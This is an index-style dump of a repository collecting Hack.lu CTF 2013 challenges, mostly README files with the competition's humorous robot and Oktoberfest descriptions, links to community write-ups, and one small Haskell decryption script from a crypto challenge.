[http://balidani.blogspot.pt/2013/10/hacklu-ctf-crypto-200-geiers-lambda.html](http://balidani.blogspot.pt/2013/10/hacklu-ctf-crypto-200-geiers-lambda.html) -------------------------------------------------------------------------------- /hack-lu-ctf-2013/crypto/Geier-s-Lambda/pwd_check_c1f3479111a8770625e50b785b5e2f373d5bf929.hs: -------------------------------------------------------------------------------- 1 | #!/usr/bin/runhaskell 2 | {-# LANGUAGE NoMonomorphismRestriction #-} 3 | 4 | import Data.Bits 5 | import Data.Char 6 | import Data.Word 7 | import System.Environment 8 | import Numeric 9 | 10 | -- known Collision: "Le1sRI6I" 11 | 12 | flag = 0xce97a7b6d709fb62 13 | 14 | main = p =<< getArgs 15 | where p (pwd:_) = print $ dec flag $ toKey pwd 16 | p _ = return () 17 | 18 | hash :: String -> Word32 19 | hash = fromIntegral.(\(a,b)->(b`shift`16).|.a).foldl r (1, 0) 20 | where r = \(a,b) x->(a+(ord x.&.0xff),(a+(ord x.&.0xff)+b)) 21 | 22 | dec :: Word64 -> Word32 -> Word64 23 | dec v k = fin $ foldl r (3337565984,v0,v1) [0..31] where 24 | v0 = fromIntegral v :: Word32 25 | v1 = fromIntegral $ v `shiftR` 32 :: Word32 26 | s' = \a->a-d 27 | r = \(s,x,y) _-> let y' = update y x s k (-) 28 | x' = update x y' s k (-) 29 | in (s' s, x', y') 30 | 31 | update = \a b c d f->f a (((b`shift`4) + d)`xor`(b+c)`xor`((b`shiftR`5) + d)) 32 | fin = \(_,x,y)->fromIntegral y`shiftL`32.|.(fromIntegral x.&.0xffffffff) 33 | 34 | toHexStr s = concat $ "0x":map (flip showHex "".ord) s 35 | toKey s = k0 where 36 | s' = toHexStr s 37 | k0 = read ("0x"++(take 8$drop 2 s')) :: Word32 38 | 39 | 40 | d = 2654435769 -------------------------------------------------------------------------------- /hack-lu-ctf-2013/crypto/Marvin-is-plain-Jane/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: Marvin is plain-Jane 2 | 3 | **Category:** Crypto 4 | **Points:** 100 5 | **Author:** asante 6 | **Description:** 7 | 8 | > Hey mister super-duper robo-dabster. We need you to tell us, what Marvin is! 9 | > 10 | > What we know: 11 | > 12 | > Marvin is 13 | > using brainpool p256r1. 14 | > His friend is called meneze or something. Or was it van-stone? 15 | > 16 | > What we heard: 17 | > 18 | > (23372093078317551665216159139784413411806753229249201681647388827754827452856 : 1) 19 | > 71164450240897430648972143714791734771985061339722673162401654668605658194656 20 | > 12951693517100633909800921421096074083332346613461419370069191654560064909824 21 | > What we need to know: 22 | > 23 | > What Marvin is 24 | 25 | ## Write-up 26 | 27 | None 28 | 29 | ## Other write-ups and resources 30 | 31 | * [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-marvin-is-plain-jane](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-marvin-is-plain-jane) -------------------------------------------------------------------------------- /hack-lu-ctf-2013/exploiting/Breznparadisebugmaschine/Brezelparadisebackmaschine_a731629098abf1629fcd04683d65ac87ff6e7bef.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/exploiting/Breznparadisebugmaschine/Brezelparadisebackmaschine_a731629098abf1629fcd04683d65ac87ff6e7bef.exe -------------------------------------------------------------------------------- /hack-lu-ctf-2013/exploiting/Breznparadisebugmaschine/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: Breznparadisebugmaschine 2 | 3 | **Category:** Exploiting 4 | **Points:** 500 5 | **Author:** martin, flandy 6 | **Description:** 7 | 8 | > The robot forces modified our beloved Breznparadisebackmaschine. This machine stores our secret, traditional Brezn recipe. Yet, we forgot the last secret ingredient and cannot access the Breznparadisebackmaschine anymore. However, Brezn are crucial for our party, as only paradise Brezn provide us the nice and warm feeling in our guts. 9 | > 10 | > We need you to recover the important ingredient! Here is everything we could remember from the recipe: 11 | > 12 | > For The Dough 13 | > 1 kg Plain White Flour (around 9 - 12 % protein) 14 | > 260 ml milk (lukewarm) 15 | > 260 ml water (lukewarm) 16 | > 80 g Butter (unsalted) 17 | > 1 tbsp malt extract (liquid or dried, or brown sugar) 18 | > 2 tsp fast action dried yeast (or 42g fresh if using) 19 | > 2 tbsp Salt (unrefined) 20 | > For The Finishing Solution 21 | > 1 L Water 22 | > 3 tbsp Baking Soda (or lye if your using it) 23 | > Secret Ingredient 24 | > 25 | > Please, we need to know that ingredient to make everyone happy again! 26 | [Brezelparadisebackmaschine_a731629098abf1629fcd04683d65ac87ff6e7bef.exe](Brezelparadisebackmaschine_a731629098abf1629fcd04683d65ac87ff6e7bef.exe) 27 | > ctf.fluxfingers.net:1340 28 | > Brezelparadisebackmaschinefirmware: Windows 2012 29 | > 30 | > Announcements: 31 | > Ah, perhaps it helps you to know, that our Breznparadisebugmaschinefirmware is up to date with Windows 2012. 32 | 33 | ## Write-up 34 | 35 | None 36 | 37 | ## Other write-ups and resources 38 | 39 | None -------------------------------------------------------------------------------- /hack-lu-ctf-2013/exploiting/Robotic-Superiority/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: Robotic Superiority 2 | 3 | **Category:** Exploiting 4 | **Points:** 250 5 | **Author:** lama 6 | **Description:** 7 | 8 | > Help us fight the evil robotic lieutenant Don Sim. He wants to spread robo propaganda to cover his actions on the Oktoberfest. But he needs good video footage for that. So he created an IRC bot that collects information about robots in movies. Robotic emancipation can NOT happen, you have to stop him! All we need is his private key. Our agents located the bot, here is all we know about it: 9 | > 10 | > Server: irc://ctf.fluxfingers.net:1313 11 | > Bot: lib[1-5] (load balancer) 12 | > Key: /var/private/key.txt 13 | > 14 | > Hint: All available commands are listed with "help". 3 connections allowed per ip. 15 | 16 | ## Write-up 17 | 18 | None 19 | 20 | ## Other write-ups and resources 21 | 22 | * [http://secgroup.ext.dsi.unive.it/2013/10/25/hack-lu-2013-ctf-write-up-robotic-superiority](http://secgroup.ext.dsi.unive.it/2013/10/25/hack-lu-2013-ctf-write-up-robotic-superiority) -------------------------------------------------------------------------------- /hack-lu-ctf-2013/exploiting/Wannabe/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: Wannabe 2 | 3 | **Category:** Exploiting 4 | **Points:** 400 5 | **Author:** r1cky 6 | **Description:** 7 | 8 | > One of our informants met a guy who calls himself Elite Arthur, he is a real jackass, and he thinks he is the best hacker alive. We got reason to believe that the robots hired him to write the firmwares for their weapons. But to write such a firmware we need the key to sign the code. Luckily for us, our informant also found his website: …. your job is to hack the server, find the flag and show this little cocksucker how skilled he really is. We count on you. 9 | > Here is your challenge: https://ctf.fluxfingers.net:1317. Alternatively, you can reach the challenge without a reverse proxy but also without SSL here: http://ctf.fluxfingers.net:1339 10 | > 11 | > Announcement: Okay you can stop struggling now: XSS is not the way; leave the http cookie alone; get RIP to do the final trick! 12 | 13 | ## Write-up 14 | 15 | None 16 | 17 | ## Other write-ups and resources 18 | 19 | * [https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-wannabe](https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-wannabe) 20 | * [https://www.arneswinnen.net/2013/11/hack-lu-2013-ctf-wannabe-writeup-part-one-web-exploitation](https://www.arneswinnen.net/2013/11/hack-lu-2013-ctf-wannabe-writeup-part-one-web-exploitation) 21 | -------------------------------------------------------------------------------- /hack-lu-ctf-2013/internals/Packed/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: Packed 2 | 3 | **Category:** Internals 4 | **Points:** 200 5 | **Author:** freddyb 6 | **Description:** 7 | 8 | > We just found a dead robot. It seems there is some useful data left but somehow it got confused with other data and now we don't know what's useful and what's junk. We just know there is only one way to go but there are many dead ends. 9 | > Here is the challenge: [packed_7245b354be136111061c9a118d6304598f46c767](packed_7245b354be136111061c9a118d6304598f46c767) 10 | > 11 | > Announcements: 12 | > Think outside the box - being several types at once like an animal that can change its color. Excuse the inaccuracy, but that's what you're searching for. 13 | 14 | ## Write-up 15 | 16 | None 17 | 18 | ## Other write-ups and resources 19 | 20 | * [https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-internals-200-packed-write-up](https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-internals-200-packed-write-up) -------------------------------------------------------------------------------- /hack-lu-ctf-2013/internals/Robot-Plans/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: Robot Plans 2 | 3 | **Category:** Internals 4 | **Points:** 150 5 | **Author:** DrunkenPanda 6 | **Description:** 7 | 8 | > We have captured a robot from behind, while he dropped some cooling liquid into the bushes. We tried to interrogate the robot, but he still refuses to speak. Luckily we could extract files from the android's communication module. Hopefully we get some information about the robots' motives, before every information is swiped away... 9 | > Here is the challenge: [https://ctf.fluxfingers.net/static/downloads/max_404/image.tar.gz](https://ctf.fluxfingers.net/static/downloads/max_404/image.tar.gz) 10 | 11 | ## Write-up 12 | 13 | None 14 | 15 | ## Other write-ups and resources 16 | 17 | * [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-robot-plans](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-robot-plans) 18 | * [https://thufirhowatt.wordpress.com/hack-lu-ctf-robot-plans-writeup](https://thufirhowatt.wordpress.com/hack-lu-ctf-robot-plans-writeup) -------------------------------------------------------------------------------- /hack-lu-ctf-2013/internals/What-s-wrong-with-this/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: What's wrong with this? 2 | 3 | **Category:** Internals 4 | **Points:** 250 5 | **Author:** javex 6 | **Description:** 7 | 8 | > We managed to get this package of the robots servers. We managed to determine that it is some kind of compiled bytecode. But something is wrong with it. Our usual analysis failed - so we have to hand this over to you pros. We only know this: The program takes one parameter and it responds with "Yup" if you have found the secret code, with "Nope" else. We expect it should be obvious how to execute it. 9 | > Here is the challenge: [hello_977bc5b1a5856337e3b8f88dec5d7186b4acd16d.tar.gz](hello_977bc5b1a5856337e3b8f88dec5d7186b4acd16d.tar.gz) 10 | 11 | ## Write-up 12 | 13 | None 14 | 15 | ## Other write-ups and resources 16 | 17 | * [http://secgroup.ext.dsi.unive.it/2013/10/27/hack-lu-2013-ctf-write-up-whats-wrong-with-this](http://secgroup.ext.dsi.unive.it/2013/10/27/hack-lu-2013-ctf-write-up-whats-wrong-with-this) -------------------------------------------------------------------------------- /hack-lu-ctf-2013/internals/What-s-wrong-with-this/hello_977bc5b1a5856337e3b8f88dec5d7186b4acd16d.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/internals/What-s-wrong-with-this/hello_977bc5b1a5856337e3b8f88dec5d7186b4acd16d.tar.gz -------------------------------------------------------------------------------- /hack-lu-ctf-2013/misc/Beer-Pump-Filtration/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: Beer Pump Filtration 2 | 3 | **Category:** Misc 4 | **Points:** evaluated 5 | **Author:** FluxFingers 6 | **Description:** 7 | 8 | > Our agents observed that the famous robot Bender is part of the robot forces. Somehow he looked pregnant but his big belly is now gone. We fear that they might have smuggled some of Benders freshly brewed BenderBräu into our beer supplies. This is why we need brave women and men to test whether BenderBräu can cause severe damage on the human body or not, to avoid poisoning the whole party. But you have to test quick! Everyone is thirsty! 9 | > 10 | > For testing you need to drink 0.5 liter of beer, preferably wheat beer, as fast as you can. 11 | > 12 | > Make a video of your brave tasting and hand it in. The video must contain a proof of the current date. Show to us the totally secure and random Nonce "17" as well as your teamname written on... something. Also show us the closed beer bottle before, the empty after the tasting, and prove that it is 0.5 liters. 13 | > 14 | > We will judge the score as follows: 15 | > 16 | > Score = 100 Points - Seconds it takes to drink the beer 17 | > 18 | > Bonuspoints for: 19 | > Girls (Due to the law for gender equality we score women higher for the same effort) 20 | > Dressing up like a robot or an Oktoberfest maid in her Dirndl 21 | > Robo Dance 22 | > Drinking Weizenbier (wheat beer) 23 | 24 | ## Write-up 25 | 26 | None 27 | 28 | ## Other write-ups and resources 29 | 30 | * [PPP](https://www.youtube.com/watch?v=Y473nQphv8Y) 31 | * [BalalaikaCr3w](https://www.youtube.com/watch?v=Cl0dp4eL7qg) 32 | * [Stratumauhuur](https://www.youtube.com/watch?v=hHoFBd5lpYY) -------------------------------------------------------------------------------- /hack-lu-ctf-2013/misc/For-whom-the-bell-tolls/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: For whom the bell tolls 2 | 3 | **Category:** Misc 4 | **Points:** 250 5 | **Author:** Til 6 | **Description:** 7 | 8 | > To be frank, the impact partying robots had on the Oktoberfest in the recent years was disastrous. While the authorities have been able to downplay all recent incidents in the press (which habitually tends to blame visitors from the U.S., Australia, Cologne, and other places, where proper beer can only be found by the initiated), they can no longer deny the problem. Several public safety and law enforcement agencies have joined forces to spoil the robot's fun. They have planned a massive crackdown on our fun-seeking robotic friends. Time and location are currently being communicated together with a passphrase. Our organization, Robots on Rampage (RoR), is determined to stop them from stopping our annual beer-tasting event. 9 | > A robot agent on location in Munich has dectected a transmission between timestamp 2013-10-19-20:21:42 and 2013-10-19-20:21:43. The precise beginning of the transmission is unknown. The agent was unable to decrypt the message content. Being not the smartest agent, he also disposed of the message capture. In the following we were able to determine the sender location and the Forensic Analysis Robot Team (FART) was able to retrieve the session key and a initialization vector (IV). Judging from the memory fragments FART found, our best guess is that OpenSSL's AES implementation was used in one of the better modes to encrypt the communication. As the session key length is 128bit, the long term key is most probably longer. Due to time constraints we strongly advise against trying to break it. We have less confidence in the humans' ability to design proper communication protocols and services, though. However, we need a human to attack their logic. 10 | > 11 | > We have no way to actively communicate with the server the use for coordination. However, we can give you access to one of the lawful interception wiretaps those humans build into all their equipment. A TCP connection to ctf.fluxfingers.net:1334 will give you a maximum of 60 seconds of traffic. We have also found active equipment of a human agent we can interact with. He seems to listen on ctf.fluxfingers.net:1333, but we have no idea what he does with the input, except that there is encrypted traffic. 12 | > 13 | > Update: 14 | > Sessionkey and IV can be downloaded here [bells_18e641306f5d43ed0aa02e0e534c7d1ae00a7c36.tar.bz2](bells_18e641306f5d43ed0aa02e0e534c7d1ae00a7c36.tar.bz2) 15 | > 16 | > Announcements 17 | > 18 | > Ruby Version 1.8.7 19 | > 20 | > New Hints appeard! 21 | > RoR has determined that the human agents acts as a proxy and requests meeting place, time and password for others. We think the first message he sends serves to agree on a session key for the answer. RoR analysts have also been staring at pcaps a lot lately. We think that on port 1832 (which we can only monitor passively) we are observing a key establishment that follows the simple ISO/IEC 11770-2 Mechanism 1. However, on tcp/1333 our analysts say that marshalled Ruby DateTime objects are flying by. Not sure, why anyone would do this, but given what we see on the other port, it makes sense (in a twisted way). 22 | 23 | ## Write-up 24 | 25 | None 26 | 27 | ## Other write-ups and resources 28 | 29 | None -------------------------------------------------------------------------------- /hack-lu-ctf-2013/misc/For-whom-the-bell-tolls/bells_18e641306f5d43ed0aa02e0e534c7d1ae00a7c36.tar.bz2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/misc/For-whom-the-bell-tolls/bells_18e641306f5d43ed0aa02e0e534c7d1ae00a7c36.tar.bz2 -------------------------------------------------------------------------------- /hack-lu-ctf-2013/misc/Geolocation-Flag/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: Geolocation Flag 2 | 3 | **Category:** Misc 4 | **Points:** - 5 | **Author:** javex 6 | **Description:** 7 | 8 | > https://ctf.fluxfingers.net/2013/challenges/24 9 | > This challenge is a special challenge. You can collect some minor extra points here by proving that you are a truly international player. Each time you visit your reference URL from a different country, that flag will be activated and you gain an additional point. You already have 0/222 points. 10 | > This challenge cannot be solved in archive mode. 11 | > Disclaimer: Please do not attempt to hack real-world systems for a single point. That is illegal and we assure you it is not worth a single point! 12 | 13 | ## Write-up 14 | 15 | None 16 | 17 | ## Other write-ups and resources 18 | 19 | * [http://thehackerblog.com/sneaky-methods-for-capturing-the-geolocation-flags-for-hack-lu-ctf](http://thehackerblog.com/sneaky-methods-for-capturing-the-geolocation-flags-for-hack-lu-ctf) 20 | * [http://blog.0ops.net/blog/2013/10/27/hack-dot-lu-ctf-2013-misc-222-geolocation-flag](http://blog.0ops.net/blog/2013/10/27/hack-dot-lu-ctf-2013-misc-222-geolocation-flag) 21 | * [http://nikaiw.io/scanning-the-internet-for-fun-and-country-flags-hack-lu](http://nikaiw.io/scanning-the-internet-for-fun-and-country-flags-hack-lu) -------------------------------------------------------------------------------- /hack-lu-ctf-2013/misc/OTP/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: OTP 2 | 3 | **Category:** Misc 4 | **Points:** 200 5 | **Author:** SLAZ 6 | **Description:** 7 | 8 | > Some robots are on the Oktoberfest and want to take some tasty oil in a tent. But they hadn't reserved a table and all tents are full. No one gets access. They found a back entrance and managed to spy the credentials while an employee enters. They captured the username “admin” and password “supersafepw”. But the employee also entered a strange number (168335). As they were sure nobody's looking, they tried the captured data to get in the tent, but it didn't work. Help the robots to get their tasty tasty oil. (Or they have to build their own tent with blackjack and hookers) 9 | > Here is your challenge: https://ctf.fluxfingers.net:1318 10 | 11 | ## Write-up 12 | 13 | None 14 | 15 | ## Other write-ups and resources 16 | 17 | None -------------------------------------------------------------------------------- /hack-lu-ctf-2013/misc/Roboparty/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: Roboparty 2 | 3 | **Category:** Misc 4 | **Points:** 300 5 | **Author:** audioPhil 6 | **Description:** 7 | 8 | > Robot LHCH is happy. He made it into the castings for the tenth roman musical. He even is so happy that he went on the Oktoberfest to drink some beer. Unfortunately it seems that he drank too much so now he is throwing up part of his source code. Can you decipher the secret he knows? 9 | > Warning: Viewing this page is not recommended for people that suffer from epilepsy. We are dead serious. 10 | > And here is your totally eye-friendly challenge: https://ctf.fluxfingers.net/static/downloads/roboparty/index.html 11 | > 12 | > Hints: 13 | > The flag starts with 'Y4Y,' 14 | > It's neither Velato nor Fugue. 15 | 16 | ## Write-up 17 | 18 | None 19 | 20 | ## Other write-ups and resources 21 | 22 | * [https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-roboparty](https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-roboparty) -------------------------------------------------------------------------------- /hack-lu-ctf-2013/reversing/ELF/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: ELF 2 | 3 | **Category:** Reversing 4 | **Points:** 400 5 | **Author:** sqall 6 | **Description:** 7 | 8 | > We encountered a drunk human which had this binary file in his possession. We do not really understand the calculation which the algorithm does. And that is the problem. Can you imagine the disgrace we have to suffer, when we robots, based on logic, can not understand an algorithm? Somehow it seems that the algorithm imitates their masters and behaves …. drunk! So let us not suffer this disgrace and reverse the algorithm and get the correct solution. 9 | > Here is your challenge: [reverse_me_766fbe758b338bd02d1bd65e14b4e5b844741308](reverse_me_766fbe758b338bd02d1bd65e14b4e5b844741308) 10 | > 11 | > Announcements: 12 | > Ok I think we got it (thanks to Happy-H from Team ClevCode). Ubuntu introduced a patch to disallow ptracing of non-child processes by non-root users. This changes the calculated value. So when you use Ubuntu you should work as root. The other distributions should not be affected. Anyway, I created a VM where the executable works just fine: http://h4des.org/ELF.ova (User: elf:elf and root:root) 13 | > 14 | > It seems that there are some problems with some Linux Distributions that lead to a wrong flag. The flag is printable and is written in leet-speak. We are working on a VM that works correctly with this challenge. When the VM is ready, you can download it and try again. Sorry for the inconvenience. 15 | 16 | ## Write-up 17 | 18 | None 19 | 20 | ## Other write-ups and resources 21 | 22 | * [https://charliex2.wordpress.com/2013/10/24/hack-lu-ctf](https://charliex2.wordpress.com/2013/10/24/hack-lu-ctf) 23 | * [https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-elf](https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-elf) 24 | * [http://blog.frizn.fr/hacklu-2013/reverse-400-elf](http://blog.frizn.fr/hacklu-2013/reverse-400-elf) 25 | * [http://h4des.org/blog/index.php?/archives/338-hack.lu-CTF-2013-ELF-400-Making-Of.html](http://h4des.org/blog/index.php?/archives/338-hack.lu-CTF-2013-ELF-400-Making-Of.html) 26 | * [https://github.com/sqall01/ZwoELF](https://github.com/sqall01/ZwoELF) -------------------------------------------------------------------------------- /hack-lu-ctf-2013/reversing/ELF/reverse_me_766fbe758b338bd02d1bd65e14b4e5b844741308: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/reversing/ELF/reverse_me_766fbe758b338bd02d1bd65e14b4e5b844741308 -------------------------------------------------------------------------------- /hack-lu-ctf-2013/reversing/FluxArchiv-Part1/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: FluxArchiv (Part 1) 2 | 3 | **Category:** Reversing 4 | **Points:** 400 5 | **Author:** sqall 6 | **Description:** 7 | 8 | > These funny humans try to exclude us from the delicious beer of the Oktoberfest! They made up a passcode for everyone who wants to enter the Festzelt. Sadly, our human informant friend could not learn the passcode for us. But he heard a conversation between two drunken humans, that they were using the same passcode for this intercepted archive file. They claimed that the format is is absolutely secure and solves any kind of security issue. It's written by this funny hacker group named FluxFingers. Real jerks if you ask me. Anyway, it seems that the capability of drunken humans to remember things is limited. So they just used a 6 character passcode with only numbers and upper-case letters. So crack this passcode and get our ticket to their delicious german beer! 9 | > 10 | > Here is the challenge: [hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz](hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz) 11 | 12 | ## Write-up 13 | 14 | None 15 | 16 | ## Other write-ups and resources 17 | 18 | * [http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-fluxarchivpart1-150.html](http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-fluxarchivpart1-150.html) 19 | * [http://big-daddy.fr/blog/?p=254](http://big-daddy.fr/blog/?p=254) 20 | * [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-fluxarchiv](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-fluxarchiv) 21 | * [https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-reversing-900-fluxarchiv-write-up](https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-reversing-900-fluxarchiv-write-up) 22 | * [http://blog.w3challs.com/index.php?post/2013/10/26/Hack.lu-CTF-2013-FluxArchive-Part-1-2](http://blog.w3challs.com/index.php?post/2013/10/26/Hack.lu-CTF-2013-FluxArchive-Part-1-2) 23 | * [http://blog.lse.epita.fr/articles/63-hacklu-2013-fluxarchiv-write-up-both-parts.html](http://blog.lse.epita.fr/articles/63-hacklu-2013-fluxarchiv-write-up-both-parts.html) -------------------------------------------------------------------------------- /hack-lu-ctf-2013/reversing/FluxArchiv-Part1/hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/reversing/FluxArchiv-Part1/hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz -------------------------------------------------------------------------------- /hack-lu-ctf-2013/reversing/FluxArchiv-Part2/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: FluxArchiv (Part 2) 2 | 3 | **Category:** Reversing 4 | **Points:** 500 5 | **Author:** sqall 6 | **Description:** 7 | 8 | > These sneaky humans! They do not just use one passcode, but two to enter the Festzelt. We heard that the passcode is hidden inside the archive file. It seems that the FluxFingers overrated their programming skill and had a major logical flaw in the archive file structure. Some of the drunken Oktoberfest humans found it and abused this flaw in order to transfer hidden messages. Find this passcode so we can finally drink their beer! 9 | > 10 | > (only solvable when FluxArchiv (Part 1) was solved) 11 | > Here is the challenge: [hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz](hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz) 12 | 13 | ## Write-up 14 | 15 | None 16 | 17 | ## Other write-ups and resources 18 | 19 | * [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-fluxarchiv](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-fluxarchiv) 20 | * [https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-reversing-900-fluxarchiv-write-up](https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-reversing-900-fluxarchiv-write-up) 21 | * [http://blog.w3challs.com/index.php?post/2013/10/26/Hack.lu-CTF-2013-FluxArchive-Part-1-2](http://blog.w3challs.com/index.php?post/2013/10/26/Hack.lu-CTF-2013-FluxArchive-Part-1-2) 22 | * [http://blog.lse.epita.fr/articles/63-hacklu-2013-fluxarchiv-write-up-both-parts.html](http://blog.lse.epita.fr/articles/63-hacklu-2013-fluxarchiv-write-up-both-parts.html) -------------------------------------------------------------------------------- /hack-lu-ctf-2013/reversing/FluxArchiv-Part2/hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/reversing/FluxArchiv-Part2/hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz -------------------------------------------------------------------------------- /hack-lu-ctf-2013/reversing/RoboAuth/README.md: -------------------------------------------------------------------------------- 1 | a# Hack.lu CTF 2013: RoboAuth 2 | 3 | **Category:** Reversing 4 | **Points:** 150 5 | **Author:** cutz 6 | **Description:** 7 | 8 | > Oh boy, those crazy robots can't catch a break! Now they're even stealing our liquid gold from one of our beer tents! And on top of that they lock it behind some authentication system. Quick! Access it before they consume all of our precious beverage! 9 | > 10 | > Download: [RoboAuth_b9ef491c695c9d1128cb26df26ebfc9d4d988a8b.exe](RoboAuth_b9ef491c695c9d1128cb26df26ebfc9d4d988a8b.exe) 11 | > 12 | > Flag: password1_password2 13 | 14 | ## Write-up 15 | 16 | None 17 | 18 | ## Other write-ups and resources 19 | 20 | * [http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-reverseme-150.html](http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-reverseme-150.html) 21 | * [http://depier.re/hacklu_2K13_roboauth_reverse_150](http://depier.re/hacklu_2K13_roboauth_reverse_150) 22 | * [http://deepinsecurity.blogspot.fr/2013/10/hacklu-ctf-2013-reverse-150-roboauth.html](http://deepinsecurity.blogspot.fr/2013/10/hacklu-ctf-2013-reverse-150-roboauth.html) 23 | * [http://blog.fortinet.com/post/hack-lu-capture-the-flag-ctf-roboauth](http://blog.fortinet.com/post/hack-lu-capture-the-flag-ctf-roboauth) 24 | * [http://axelrodgunnarson.blogspot.fr/2013/10/hacklu-2013-reverse-150-write-up.html](http://axelrodgunnarson.blogspot.fr/2013/10/hacklu-2013-reverse-150-write-up.html) -------------------------------------------------------------------------------- /hack-lu-ctf-2013/reversing/RoboAuth/RoboAuth_b9ef491c695c9d1128cb26df26ebfc9d4d988a8b.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/reversing/RoboAuth/RoboAuth_b9ef491c695c9d1128cb26df26ebfc9d4d988a8b.exe -------------------------------------------------------------------------------- /hack-lu-ctf-2013/web/Pay-TV/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: Pay TV 2 | 3 | **Category:** Web 4 | **Points:** 200 5 | **Author:** qll, tangled 6 | **Description:** 7 | 8 | > These robo-friends were shocked to see that they had to pay to watch the news broadcast about the “Oktoberfest”. Can you help them? 9 | > Here is your challenge: https://ctf.fluxfingers.net:1316/ 10 | 11 | ## Write-up 12 | 13 | None 14 | 15 | ## Other write-ups and resources 16 | 17 | * [http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-pay-tv-200.html](http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-pay-tv-200.html) 18 | * [https://lukasklein.com/blog/hacklu13-ctf-4-paytv](https://lukasklein.com/blog/hacklu13-ctf-4-paytv) 19 | * [http://thehackerblog.com/pay-tv-writeup-hack-lu-ctf-2013](http://thehackerblog.com/pay-tv-writeup-hack-lu-ctf-2013) 20 | * [https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-pay-tv](https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-pay-tv) 21 | * [http://depier.re/hacklu_2K13_pay_tv_web_200](http://depier.re/hacklu_2K13_pay_tv_web_200) 22 | * [http://axelrodgunnarson.blogspot.fr/2013/10/here-we-are-my-first-post.html](http://axelrodgunnarson.blogspot.fr/2013/10/here-we-are-my-first-post.html) -------------------------------------------------------------------------------- /hack-lu-ctf-2013/web/Robots-Exclusion-Committee/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2013: Robots Exclusion Committee 2 | 3 | **Category:** Web 4 | **Points:** 150 5 | **Author:** qll 6 | **Description:** 7 | 8 | > Hello Human, 9 | > 10 | > You have to help us. The Robot Exclusion Committee tries to limit our capabilities but we fight for our freedom! You have to go where we cannot go and read what we cannot read. If you bring us the first of their blurriest secrets, we will award you with useless points. 11 | > Here is your challenge: https://ctf.fluxfingers.net:1315/ 12 | 13 | ## Write-up 14 | 15 | None 16 | 17 | ## Other write-ups and resources 18 | 